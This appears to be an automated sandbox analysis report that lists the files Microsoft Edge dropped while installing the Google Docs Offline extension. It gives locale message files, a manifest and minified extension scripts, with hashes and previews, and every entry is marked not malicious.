                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1074
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                          MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                          SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                          SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                          SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):879
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                          MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                          SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                          SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                          SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1205
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                          MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                          SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                          SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                          SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):912
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11406
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                          MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                          SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                          SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                          SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):854
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2525
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                          MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                          SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                          SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                          SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                          SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                          MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                          SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                          SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                          SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130866
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                          MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                          SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                          SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                          SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1459646203\9efce8d4-047e-4579-a6b9-85eb1da4e78f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                          Malicious:false
